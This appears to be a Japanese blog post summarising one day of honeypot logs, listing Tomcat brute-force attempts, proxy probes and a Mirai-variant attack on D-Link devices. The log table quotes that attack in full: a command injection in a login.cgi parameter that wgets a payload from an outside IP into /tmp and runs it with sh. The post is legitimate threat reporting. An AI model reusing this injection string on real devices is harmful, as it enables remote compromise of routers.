ハニーポットのログ分析(2018/09/28)
WOWhoneypotの2018/09/28(金) (運用115日目)の簡易分析です。
本日の総アクセス件数は 88件です。
主なアクセスは以下となります。
・Tomcat管理ページへのブルートフォース攻撃:51件
・不正中継の調査:7件
(新規2件)
HEAD /images/banner.png HTTP/1.1
Host: api.utm999.comHEAD /images/sql2008.png HTTP/1.1
Host: admx.utm999.comHEAD /static/admin/images/login_logo.png HTTP/1.1
Host: jf.utmtoken.com
・D-Linkを狙うMirai亜種:1件
→User-Agent: Gemini/2.0
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
51 | 2018-09-28 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
27 | 2018-09-28 | アクセス | GET / |
2 | 2018-09-28 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
2 | 2018-09-28 | 不正中継の調査 | CONNECT www.baidu.com:443 |
1 | 2018-09-28 | 不正中継の調査 | HEAD /static/admin/images/login_logo.png |
1 | 2018-09-28 | 不正中継の調査 | HEAD /images/sql2008.png |
1 | 2018-09-28 | 不正中継の調査 | HEAD /images/banner.png |
1 | 2018-09-28 | 調査 | HEAD / |
1 | 2018-09-28 | クローリング | GET /robots.txt |
1 | 2018-09-28 | D-Linkを狙うMirai亜種 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://159.89.204.166/d%20-O%20-%3E%20/tmp/ds;sh%20/tmp/ds%27$ |
本日のドメイン名でのアクセスは以下です。
4 GET /
2 GET /robots.txt
本日のハンティングログは以下です。
1 2018-09-28 wget hxxp://159.89.204.166/d
以上です。